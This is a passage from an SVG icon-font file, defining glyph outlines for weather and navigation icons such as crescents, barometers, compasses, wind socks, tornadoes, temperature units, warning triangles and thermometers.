<glyph unicode="&#xeb36;" glyph-name="crescent3" d="M512 608h-0.019c0.006 0 0.013 0 0.019 0 53.019 0 96-71.634 96-160s-42.981-160-96-160c88.366 0 160 71.634 160 160s-71.634 160-160 160zM512 256c-106.039 0-192 85.961-192 192s85.961 192 192 192c106.039 0 192-85.961 192-192s-85.961-192-192-192v0z" />
<glyph unicode="&#xeb37;" glyph-name="crescent4" d="M480 571.967c10.228 2.632 20.95 4.033 32 4.033 70.692 0 128-57.308 128-128s-57.308-128-128-128c-11.050 0-21.772 1.4-32 4.033 55.207 14.209 96 64.325 96 123.967s-40.793 109.758-96 123.967v0zM512 256c106.039 0 192 85.961 192 192s-85.961 192-192 192c-106.039 0-192-85.961-192-192s85.961-192 192-192v0z" />
<glyph unicode="&#xeb38;" glyph-name="barometer" d="M572.538 274.466c21.387-14.36 35.462-38.769 35.462-66.466 0-44.183-35.817-80-80-80s-80 35.817-80 80c0 27.697 14.075 52.106 35.462 66.466l44.538 237.534 44.538-237.534zM936.847 196.107c15.009 43.875 23.153 90.933 23.153 139.893 0 238.587-193.413 432-432 432s-432-193.413-432-432c0-48.96 8.145-96.018 23.153-139.893l30.654 9.289c-14.132 40.93-21.807 84.871-21.807 130.604 0 220.914 179.086 400 400 400s400-179.086 400-400c0-45.733-7.675-89.674-21.807-130.604l30.654-9.289zM528 160c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0 0zM528 704c-8.837 0-16-6.882-16-15.695v-96.609c0-8.668 7.422-15.695 16-15.695 8.837 0 16 6.882 16 15.695v96.609c0 8.668-7.422 15.695-16 15.695v0 0zM744.365 633.699c-7.149 5.194-16.989 3.837-22.17-3.293l-56.786-78.159c-5.095-7.013-3.221-17.060 3.719-22.102 7.149-5.194 16.989-3.837 22.17 3.293l56.786 78.159c5.095 7.013 3.221 17.060-3.719 22.102v0 0zM878.085 449.648c-2.731 8.404-11.489 13.090-19.871 10.367l-91.881-29.854c-8.244-2.679-12.634-11.909-9.983-20.067 2.731-8.404 11.489-13.090 19.871-10.367l91.881 29.854c8.244 2.679 12.634 11.909 9.983 20.067v0 0zM878.085 222.149c2.731 8.404-1.601 17.344-9.983 20.067l-91.881 29.854c-8.244 2.679-17.221-2.209-19.871-10.367-2.731-8.404 1.601-17.344 9.983-20.067l91.881-29.854c8.244-2.679 17.221 2.209 19.871 10.367v0 0zM177.915 222.149c2.731-8.404 11.489-13.090 19.871-10.367l91.881 29.854c8.244 2.679 12.634 11.909 9.983 20.067-2.731 8.404-11.489 13.090-19.871 10.367l-91.881-29.854c-8.244-2.679-12.634-11.909-9.983-20.067v0 0zM177.915 449.648c-2.731-8.404 1.601-17.344 9.983-20.067l91.881-29.854c8.244-2.679 17.221 2.209 19.871 10.367 2.731 8.404-1.601 17.344-9.983 20.067l-91.881 29.854c-8.244 2.679-17.221-2.209-19.871-10.367v0 0zM311.635 633.699c-7.149-5.194-8.899-14.972-3.719-22.102l56.786-78.159c5.095-7.013 15.23-8.335 22.17-3.293 7.149 5.194 8.899 14.972 3.719 22.102l-56.786 78.159c-5.095 7.013-15.23 8.335-22.17 3.293v0 0z" />
<glyph unicode="&#xeb39;" glyph-name="barometer2" d="M572.538 274.466l-44.538 237.534-44.538-237.534c-21.387-14.36-35.462-38.769-35.462-66.466 0-5.479 0.551-10.83 1.6-16h-329.019c-15.919 45.040-24.582 93.508-24.582 144 0 238.587 193.413 432 432 432s432-193.413 432-432c0-50.492-8.662-98.96-24.582-144h-329.019c1.049 5.17 1.6 10.521 1.6 16 0 27.697-14.075 52.106-35.462 66.466zM528 160c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0 0zM528 736c-8.837 0-16-6.882-16-15.695v-96.609c0-8.668 7.422-15.695 16-15.695 8.837 0 16 6.882 16 15.695v96.609c0 8.668-7.422 15.695-16 15.695v0 0zM744.365 665.699c-7.149 5.194-16.989 3.837-22.17-3.293l-56.786-78.159c-5.095-7.013-3.221-17.060 3.719-22.102 7.149-5.194 16.989-3.837 22.17 3.293l56.786 78.159c5.095 7.013 3.221 17.060-3.719 22.102v0 0zM878.085 481.648c-2.731 8.404-11.489 13.090-19.871 10.367l-91.881-29.854c-8.244-2.679-12.634-11.909-9.983-20.067 2.731-8.404 11.489-13.090 19.871-10.367l91.881 29.854c8.244 2.679 12.634 11.909 9.983 20.067v0 0zM878.085 254.149c2.731 8.404-1.601 17.344-9.983 20.067l-91.881 29.854c-8.244 2.679-17.221-2.209-19.871-10.367-2.731-8.404 1.601-17.344 9.983-20.067l91.881-29.854c8.244-2.679 17.221 2.209 19.871 10.367v0 0zM177.915 254.149c2.731-8.404 11.489-13.090 19.871-10.367l91.881 29.854c8.244 2.679 12.634 11.909 9.983 20.067-2.731 8.404-11.489 13.090-19.871 10.367l-91.881-29.854c-8.244-2.679-12.634-11.909-9.983-20.067v0 0zM177.915 481.648c-2.731-8.404 1.601-17.344 9.983-20.067l91.881-29.854c8.244-2.679 17.221 2.209 19.871 10.367 2.731 8.404-1.601 17.344-9.983 20.067l-91.881 29.854c-8.244 2.679-17.221-2.209-19.871-10.367v0 0zM311.635 665.699c-7.149-5.194-8.899-14.972-3.719-22.102l56.786-78.159c5.095-7.013 15.23-8.335 22.17-3.293 7.149 5.194 8.899 14.972 3.719 22.102l-56.786 78.159c-5.095 7.013-15.23 8.335-22.17 3.293v0 0z" />
<glyph unicode="&#xeb3a;" glyph-name="compass-north" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM512 736c0 0 96-224 96-288 0-21.378 0 0 0 0 0-53.019-43.089-96-96-96-53.019 0-96 42.78-96 96 0 0 0-38.72 0 0 0 64 96 288 96 288v0zM512 384c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeb3b;" glyph-name="compass-north2" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM512 96c194.404 0 352 157.596 352 352s-157.596 352-352 352c-194.404 0-352-157.596-352-352s157.596-352 352-352v0zM512 736c0 0 96-224 96-288 0-21.378 0 0 0 0 0-53.019-43.089-96-96-96-53.019 0-96 42.78-96 96 0 0 0-38.72 0 0 0 64 96 288 96 288v0zM512 384c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeb3c;" glyph-name="compass-west" d="M96 448v0c0-229.75 186.25-416 416-416s416 186.25 416 416c0 229.75-186.25 416-416 416s-416-186.25-416-416zM128 448c0 212.077 171.923 384 384 384s384-171.923 384-384c0-212.077-171.923-384-384-384s-384 171.923-384 384v0zM608 448c0 53.019-42.78 96-96 96-64 0-288-96-288-96s224-96 288-96c53.019 0 96 43.089 96 96v0zM448 448c0 35.346 28.654 64 64 64s64-28.654 64-64c0-35.346-28.654-64-64-64s-64 28.654-64 64v0z" />
<glyph unicode="&#xeb3d;" glyph-name="compass-west2" d="M512 864v0c229.75 0 416-186.25 416-416s-186.25-416-416-416c-229.75 0-416 186.25-416 416s186.25 416 416 416zM512 832c-212.077 0-384-171.923-384-384s171.923-384 384-384c212.077 0 384 171.923 384 384s-171.923 384-384 384v0zM512 800c-194.404 0-352-157.596-352-352s157.596-352 352-352c194.404 0 352 157.596 352 352s-157.596 352-352 352v0zM512 544c53.019 0 96-43.089 96-96 0-53.019-42.78-96-96-96-64 0-288 96-288 96s224 96 288 96v0zM512 512c-35.346 0-64-28.654-64-64s28.654-64 64-64c35.346 0 64 28.654 64 64s-28.654 64-64 64v0z" />
<glyph unicode="&#xeb3e;" glyph-name="compass-east" d="M928 448v0c0 229.75-186.25 416-416 416s-416-186.25-416-416c0-229.75 186.25-416 416-416s416 186.25 416 416zM896 448c0-212.077-171.923-384-384-384s-384 171.923-384 384c0 212.077 171.923 384 384 384s384-171.923 384-384v0zM416 448c0-53.019 42.78-96 96-96 64 0 288 96 288 96s-224 96-288 96c-53.019 0-96-43.089-96-96v0zM576 448c0-35.346-28.654-64-64-64s-64 28.654-64 64c0 35.346 28.654 64 64 64s64-28.654 64-64v0z" />
<glyph unicode="&#xeb3f;" glyph-name="compass-east2" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM512 96c194.404 0 352 157.596 352 352s-157.596 352-352 352c-194.404 0-352-157.596-352-352s157.596-352 352-352v0zM512 352c-53.019 0-96 43.089-96 96 0 53.019 42.78 96 96 96 64 0 288-96 288-96s-224-96-288-96v0zM512 384c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0z" />
<glyph unicode="&#xeb40;" glyph-name="compass-south" d="M928 448v0c0 229.75-186.25 416-416 416s-416-186.25-416-416c0-229.75 186.25-416 416-416s416 186.25 416 416zM896 448c0-212.077-171.923-384-384-384s-384 171.923-384 384c0 212.077 171.923 384 384 384s384-171.923 384-384v0zM608 448c0 53.019-43.089 96-96 96-53.019 0-96-42.78-96-96 0-64 96-288 96-288s96 224 96 288v0zM576 448c0-35.346-28.654-64-64-64s-64 28.654-64 64c0 35.346 28.654 64 64 64s64-28.654 64-64v0z" />
<glyph unicode="&#xeb41;" glyph-name="compass-south2" d="M96 448v0c0 229.75 186.25 416 416 416s416-186.25 416-416c0-229.75-186.25-416-416-416s-416 186.25-416 416zM128 448c0-212.077 171.923-384 384-384s384 171.923 384 384c0 212.077-171.923 384-384 384s-384-171.923-384-384v0zM160 448c0-194.404 157.596-352 352-352s352 157.596 352 352c0 194.404-157.596 352-352 352s-352-157.596-352-352v0zM416 448c0 53.019 43.089 96 96 96 53.019 0 96-42.78 96-96 0-64-96-288-96-288s-96 224-96 288v0zM448 448c0-35.346 28.654-64 64-64s64 28.654 64 64c0 35.346-28.654 64-64 64s-64-28.654-64-64v0z" />
<glyph unicode="&#xeb42;" glyph-name="air-sock" d="M736 595.198l-64-6.858v167.506l64-6.846v-153.802zM768 598.627v146.95l64-6.846v-133.246l-64-6.858zM640 584.911l-96-10.287v194.914l96-10.269v-174.358zM512 571.196l-96-10.287v222.322l96-10.269v-201.766zM384 557.48l-96-10.287v249.73l96-10.269v-229.174zM208 832c-8.837 0-16-6.916-16-15.98v-768.039c0-8.826 7.422-15.98 16-15.98 8.837 0 16 6.916 16 15.98v768.039c0 8.826-7.422 15.98-16 15.98v0zM256 832v-320l608 64v192l-608 64z" />
<glyph unicode="&#xeb43;" glyph-name="air-sock2" d="M512 571.196v201.766l128-13.693v-174.358l-128-13.716zM416 560.909l-128-13.716v249.73l128-13.693v-222.322zM736 595.198v153.802l96-10.269v-133.246l-96-10.287zM208 832c-8.837 0-16-6.916-16-15.98v-768.039c0-8.826 7.422-15.98 16-15.98 8.837 0 16 6.916 16 15.98v768.039c0 8.826-7.422 15.98-16 15.98v0zM256 832v-320l608 64v192l-608 64z" />
<glyph unicode="&#xeb44;" glyph-name="tornado" d="M894.699 820.828v0 0c-16.184-65.992-181.343-117.86-382.699-117.86-162.44 0-301.323 33.757-357.435 81.453 45.361-55.478 146.108-123.126 90.643-199.719-180.973-161.906-113.955-296.739-59.4-344.758 116.984-102.969 198.27-112.528 274.176-143.047 76.582-30.791 92.836-76.379 92.836-76.379s35.189 68.276-149.5 149.402c-148.848 65.383-27.918 201.369 199.783 338.902 192.722 116.406 302.551 244.95 291.597 312.006zM112.575 860.903c33.332 54.73 179.076 99.097 399.979 99.097s363.784-52.706 399.979-99.097c49.997-64.083-28.165-215.528-266.652-363.355-203.336-126.038-353.246-248.622-233.321-297.29 285.611-115.907 133.326-264.258 133.326-264.258s0 99.097-99.995 132.129c-169.029 55.837-233.321 99.097-299.984 165.161-50.429 49.976-104.7 207.715 66.663 363.355 85.273 77.449-163.945 159.253-99.995 264.258v0zM864 830.968c0 53.019-157.596 96-352 96s-352-42.981-352-96c0-53.019 157.596-96 352-96s352 42.981 352 96v0z" />
<glyph unicode="&#xeb45;" glyph-name="tornado2" d="M112.575 860.903c33.332 54.73 179.076 99.097 399.979 99.097s363.784-52.706 399.979-99.097c49.997-64.083-28.165-215.528-266.652-363.355-203.336-126.038-353.246-248.622-233.321-297.29 285.611-115.907 133.326-264.258 133.326-264.258s0 99.097-99.995 132.129c-169.029 55.837-233.321 99.097-299.984 165.161-50.429 49.976-104.7 207.715 66.663 363.355 85.273 77.449-163.945 159.253-99.995 264.258v0zM864 830.968c0 53.019-157.596 96-352 96s-352-42.981-352-96c0-53.019 157.596-96 352-96s352 42.981 352 96v0z" />
<glyph unicode="&#xeb46;" glyph-name="degree-fahrenheit" d="M288 512v0c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM288 544c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0zM640.070 768c-88.404 0-160.070-71.553-160.070-159.848v-464.332c0-8.737 7.422-15.82 16-15.82v0c8.837 0 16 7.285 16 16.309v303.691h207.89c8.897 0 16.11 7.422 16.11 16v0c0 8.837-7.453 16-16.11 16h-207.89v128c0 70.692 57.338 128 128.076 128h207.885c8.858 0 16.039 7.422 16.039 16v0c0 8.837-7.328 16-16.011 16h-207.919z" />
<glyph unicode="&#xeb47;" glyph-name="degree-fahrenheit2" d="M288 512v0c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM288 576c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0zM640.070 768c-88.404 0-160.070-71.553-160.070-159.848v-448.414c0-17.528 14.204-31.738 32-31.738v0c17.673 0 32 14.282 32 31.921v256.079h160.295c17.51 0 31.705 14.204 31.705 32v0c0 17.673-14.431 32-31.705 32h-160.295v127.704c0 53.183 43.157 96.296 96.011 96.296h192.137c17.592 0 31.853 14.204 31.853 32v0c0 17.673-14.584 32-32.079 32h-191.851z" />
<glyph unicode="&#xeb48;" glyph-name="degree-celsius" d="M832 592c0-8.837 7.422-16 16-16 8.837 0 16 7.422 16 16v16.152c0 88.282-71.328 159.848-160.070 159.848h-63.86c-88.404 0-160.070-71.553-160.070-159.848v-320.304c0-88.282 71.328-159.848 160.070-159.848h63.86c88.404 0 160.070 71.553 160.070 159.848v16.152c0 8.837-7.422 16-16 16-8.837 0-16-7.422-16-16v-16.167c0-70.498-57.447-127.833-128.312-127.833h-63.375c-71.103 0-128.312 57.233-128.312 127.833v320.334c0 70.498 57.447 127.833 128.312 127.833h63.375c71.103 0 128.312-57.233 128.312-127.833v-16.167zM288 512v0c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM288 544c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0z" />
<glyph unicode="&#xeb49;" glyph-name="degree-celsius2" d="M832 320c-17.673 0-32-14.204-32-32-0.162-53.389-43.104-96-96.053-96h-63.893c-53.205 0-96.053 43.116-96.053 96.303v319.393c0 53.531 43.005 96.303 96.053 96.303h63.893c53.103 0 95.89-42.953 96.053-96 0-17.673 14.204-32 32-32 17.673 0 32 14.204 32 32 0 88.434-71.328 160-160.070 160h-63.86c-88.404 0-160.070-71.553-160.070-159.848v-320.304c0-88.282 71.328-159.848 160.070-159.848h63.86c88.404 0 160.070 71.553 160.070 159.848 0 17.825-14.204 32.152-32 32.152v0zM288 512v0 0c-70.692 0-128 57.308-128 128s57.308 128 128 128c70.692 0 128-57.308 128-128s-57.308-128-128-128zM288 576c35.346 0 64 28.654 64 64s-28.654 64-64 64c-35.346 0-64-28.654-64-64s28.654-64 64-64v0 0z" />
<glyph unicode="&#xeb4a;" glyph-name="warning2" d="M461.575 763.251l-345.123-558.368c-37.289-60.329-10.11-108.884 60.438-108.884h670.194c70.532 0 97.607 48.749 60.438 108.884l-345.123 558.368c-27.776 44.938-72.983 45.045-100.825 0zM491.302 751.267c11.115 17.961 29.171 17.904 40.251 0l352.168-569.043c18.534-29.947 4.67-54.224-30.133-54.224h-684.296c-35.176 0-48.766 24.118-30.135 54.224l352.145 569.043zM512 576c-17.673 0-32-14.497-32-31.905v-192.19c0-17.621 14.204-31.905 32-31.905 17.673 0 32 14.497 32 31.905v192.19c0 17.621-14.204 31.905-32 31.905v0zM512 192c17.673 0 32 14.327 32 32s-14.327 32-32 32c-17.673 0-32-14.327-32-32s14.327-32 32-32v0z" />
<glyph unicode="&#xeb4b;" glyph-name="warning3" d="M907.5 204.9l-345.1 558.4c-27.8 44.9-73 45-100.8 0v0l-345.1-558.4c-37.3-60.3-10.2-108.9 60.4-108.9h670.2c70.5 0 97.6 48.7 60.4 108.9zM512 192c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32zM544 351.9c0-17.4-14.3-31.9-32-31.9-17.8 0-32 14.3-32 31.9v192.2c0 17.4 14.3 31.9 32 31.9v0c17.8 0 32-14.3 32-31.9v-192.2z" />
<glyph unicode="&#xeb4c;" glyph-name="compass4" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM579.882 380.118c-56.569-56.569-294.156-158.392-294.156-158.392s101.823 237.588 158.392 294.156c56.569 56.569 294.156 158.392 294.156 158.392s-101.823-237.588-158.392-294.156v0zM466.745 402.745c24.994-24.994 65.516-24.994 90.51 0s24.994 65.516 0 90.51c-24.994 24.994-65.516 24.994-90.51 0s-24.994-65.516 0-90.51v0z" />
<glyph unicode="&#xeb4d;" glyph-name="compass5" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM512 96c194.404 0 352 157.596 352 352s-157.596 352-352 352c-194.404 0-352-157.596-352-352s157.596-352 352-352v0zM579.882 380.118c-56.569-56.569-294.156-158.392-294.156-158.392s101.823 237.588 158.392 294.156c56.569 56.569 294.156 158.392 294.156 158.392s-101.823-237.588-158.392-294.156v0zM466.745 402.745c24.994-24.994 65.516-24.994 90.51 0s24.994 65.516 0 90.51c-24.994 24.994-65.516 24.994-90.51 0s-24.994-65.516 0-90.51v0z" />
<glyph unicode="&#xeb4e;" glyph-name="compass6" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM584.569 375.431c-56.569-56.569-271.529-158.392-271.529-158.392s101.823 214.96 158.392 271.529c56.569 56.569 271.529 158.392 271.529 158.392s-101.823-214.96-158.392-271.529v0zM494.059 398.059c18.745-18.745 49.137-18.745 67.882 0s18.745 49.137 0 67.882c-18.745 18.745-49.137 18.745-67.882 0s-18.745-49.137 0-67.882v0zM528 768c-8.837 0-16-6.882-16-15.695v-96.609c0-8.668 7.422-15.695 16-15.695 8.837 0 16 6.882 16 15.695v96.609c0 8.668-7.422 15.695-16 15.695v0zM865.387 430.613c0 8.837-6.882 16-15.695 16h-96.609c-8.668 0-15.695-7.422-15.695-16 0-8.837 6.882-16 15.695-16h96.609c8.668 0 15.695 7.422 15.695 16v0zM528 93.227c8.837 0 16 6.882 16 15.695v96.609c0 8.668-7.422 15.695-16 15.695-8.837 0-16-6.882-16-15.695v-96.609c0-8.668 7.422-15.695 16-15.695v0zM190.613 430.613c0-8.837 6.882-16 15.695-16h96.609c8.668 0 15.695 7.422 15.695 16 0 8.837-6.882 16-15.695 16h-96.609c-8.668 0-15.695-7.422-15.695-16v0z" />
<glyph unicode="&#xeb4f;" glyph-name="compass7" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 96c185.568 0 336 150.432 336 336s-150.432 336-336 336c-185.568 0-336-150.432-336-336s150.432-336 336-336v0zM584.569 375.431c-56.569-56.569-271.529-158.392-271.529-158.392s101.823 214.96 158.392 271.529c56.569 56.569 271.529 158.392 271.529 158.392s-101.823-214.96-158.392-271.529v0zM494.059 398.059c18.745-18.745 49.137-18.745 67.882 0s18.745 49.137 0 67.882c-18.745 18.745-49.137 18.745-67.882 0s-18.745-49.137 0-67.882v0zM528 736v0c8.578 0 16-7.027 16-15.695v-96.609c0-8.813-7.163-15.695-16-15.695-8.578 0-16 7.027-16 15.695v96.609c0 8.813 7.163 15.695 16 15.695zM833.387 430.613v0c0-8.578-7.027-16-15.695-16h-96.609c-8.813 0-15.695 7.163-15.695 16 0 8.578 7.027 16 15.695 16h96.609c8.813 0 15.695-7.163 15.695-16zM528 125.227v0c-8.578 0-16 7.027-16 15.695v96.609c0 8.813 7.163 15.695 16 15.695 8.578 0 16-7.027 16-15.695v-96.609c0-8.813-7.163-15.695-16-15.695zM222.613 430.613v0c0 8.578 7.027 16 15.695 16h96.609c8.813 0 15.695-7.163 15.695-16 0-8.578-7.027-16-15.695-16h-96.609c-8.813 0-15.695 7.163-15.695 16z" />
<glyph unicode="&#xeb50;" glyph-name="compass8" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM584.569 375.431c-56.569-56.569-271.529-158.392-271.529-158.392s101.823 214.96 158.392 271.529c56.569 56.569 271.529 158.392 271.529 158.392s-101.823-214.96-158.392-271.529v0zM528 768c-8.837 0-16-6.882-16-15.695v-96.609c0-8.668 7.422-15.695 16-15.695 8.837 0 16 6.882 16 15.695v96.609c0 8.668-7.422 15.695-16 15.695v0zM865.387 430.613c0 8.837-6.882 16-15.695 16h-96.609c-8.668 0-15.695-7.422-15.695-16 0-8.837 6.882-16 15.695-16h96.609c8.668 0 15.695 7.422 15.695 16v0zM528 93.227c8.837 0 16 6.882 16 15.695v96.609c0 8.668-7.422 15.695-16 15.695-8.837 0-16-6.882-16-15.695v-96.609c0-8.668 7.422-15.695 16-15.695v0zM190.613 430.613c0-8.837 6.882-16 15.695-16h96.609c8.668 0 15.695 7.422 15.695 16 0 8.837-6.882 16-15.695 16h-96.609c-8.668 0-15.695-7.422-15.695-16v0zM493.615 464c-33.941-33.941-110.874-178.757-110.874-178.757s144.816 76.933 178.757 110.874l-67.882 67.882z" />
<glyph unicode="&#xeb51;" glyph-name="compass9" d="M528 32v0c-220.914 0-400 179.086-400 400s179.086 400 400 400c220.914 0 400-179.086 400-400s-179.086-400-400-400zM528 64c203.241 0 368 164.759 368 368s-164.759 368-368 368c-203.241 0-368-164.759-368-368s164.759-368 368-368v0zM528 96c185.568 0 336 150.432 336 336s-150.432 336-336 336c-185.568 0-336-150.432-336-336s150.432-336 336-336v0zM584.569 375.431c-56.569-56.569-271.529-158.392-271.529-158.392s101.823 214.96 158.392 271.529c56.569 56.569 271.529 158.392 271.529 158.392s-101.823-214.96-158.392-271.529v0zM528 736v0c8.578 0 16-7.027 16-15.695v-96.609c0-8.813-7.163-15.695-16-15.695-8.578 0-16 7.027-16 15.695v96.609c0 8.813 7.163 15.695 16 15.695zM833.387 430.613v0c0-8.578-7.027-16-15.695-16h-96.609c-8.813 0-15.695 7.163-15.695 16 0 8.578 7.027 16 15.695 16h96.609c8.813 0 15.695-7.163 15.695-16zM528 125.227v0c-8.578 0-16 7.027-16 15.695v96.609c0 8.813 7.163 15.695 16 15.695 8.578 0 16-7.027 16-15.695v-96.609c0-8.813-7.163-15.695-16-15.695zM222.613 430.613v0c0 8.578 7.027 16 15.695 16h96.609c8.813 0 15.695-7.163 15.695-16 0-8.578-7.027-16-15.695-16h-96.609c-8.813 0-15.695 7.163-15.695 16zM493.615 464c-33.941-33.941-110.874-178.757-110.874-178.757s144.816 76.933 178.757 110.874l-67.882 67.882z" />
<glyph unicode="&#xeb52;" glyph-name="compass10" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM579.882 380.118c-56.569-56.569-294.156-158.392-294.156-158.392s101.823 237.588 158.392 294.156c56.569 56.569 294.156 158.392 294.156 158.392s-101.823-237.588-158.392-294.156v0zM467.855 492.8c-45.255-45.255-115.4-205.909-115.4-205.909s160.655 70.145 205.909 115.4l-90.51 90.51z" />
<glyph unicode="&#xeb53;" glyph-name="compass11" d="M512 32v0c-229.75 0-416 186.25-416 416s186.25 416 416 416c229.75 0 416-186.25 416-416s-186.25-416-416-416zM512 64c212.077 0 384 171.923 384 384s-171.923 384-384 384c-212.077 0-384-171.923-384-384s171.923-384 384-384v0zM512 96c194.404 0 352 157.596 352 352s-157.596 352-352 352c-194.404 0-352-157.596-352-352s157.596-352 352-352v0zM579.882 380.118c-56.569-56.569-294.156-158.392-294.156-158.392s101.823 237.588 158.392 294.156c56.569 56.569 294.156 158.392 294.156 158.392s-101.823-237.588-158.392-294.156v0zM467.855 492.8c-45.255-45.255-115.4-205.909-115.4-205.909s160.655 70.145 205.909 115.4l-90.51 90.51z" />
<glyph unicode="&#xeb54;" glyph-name="thermometer" d="M576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM608 256.012c38.862-29.191 64-75.666 64-128.012 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 52.346 25.138 98.821 64 128.012v576.284c0 52.693 42.981 95.704 96 95.704 52.911 0 96-42.848 96-95.704v-576.284z" />
<glyph unicode="&#xeb55;" glyph-name="thermometer2" d="M576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM638.996 272.003c39.862-35.181 65.004-86.656 65.004-144.003 0-106.039-85.961-192-192-192s-192 85.961-192 192c0 57.346 25.141 108.82 65.002 144.002-0.661 5.27-1.002 10.639-1.002 16.088v543.82c0 70.556 57.308 128.090 128 128.090 70.549 0 128-57.348 128-128.090v-543.82c0-5.447-0.342-10.816-1.004-16.087v0 0z" />
<glyph unicode="&#xeb56;" glyph-name="thermometer-low" d="M576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM608 256.012c38.862-29.191 64-75.666 64-128.012 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 52.346 25.138 98.821 64 128.012v576.284c0 52.693 42.981 95.704 96 95.704 52.911 0 96-42.848 96-95.704v-576.284zM512 32c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0z" />
<glyph unicode="&#xeb57;" glyph-name="thermometer-low2" d="M576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM638.996 272.003c39.862-35.181 65.004-86.656 65.004-144.003 0-106.039-85.961-192-192-192s-192 85.961-192 192c0 57.346 25.141 108.82 65.002 144.002-0.661 5.27-1.002 10.639-1.002 16.088v543.82c0 70.556 57.308 128.090 128 128.090 70.549 0 128-57.348 128-128.090v-543.82c0-5.447-0.342-10.816-1.004-16.087v0 0zM512 32c53.019 0 96 42.981 96 96s-42.981 96-96 96c-53.019 0-96-42.981-96-96s42.981-96 96-96v0z" />
<glyph unicode="&#xeb58;" glyph-name="thermometer-quarter" d="M543.563 218.691c37.514-13.055 64.437-48.729 64.437-90.691 0-53.019-42.981-96-96-96s-96 42.981-96 96c0 41.966 26.928 77.643 64.447 90.694-0.294 1.755-0.447 3.559-0.447 5.399v159.813c0 18.082 14.327 32.094 32 32.094 17.796 0 32-14.369 32-32.094v-159.813c0-1.847-0.149-3.652-0.437-5.403v0zM576 238.876v593.009c0 35.41-28.407 64.115-64 64.115-35.346 0-64-28.472-64-64.115v-593.009c-38.259-22.132-64-63.498-64-110.876 0-70.692 57.308-128 128-128s128 57.308 128 128c0 47.378-25.741 88.744-64 110.876zM608 256.012c38.862-29.191 64-75.666 64-128.012 0-88.366-71.634-160-160-160s-160 71.634-160 160c0 52.346 25.138 98.821 64 128.012v576.284c0 52.693 42.981 95.704 96 95.704 52.911 0 96-42.848 96-95.704v-576.284z" />
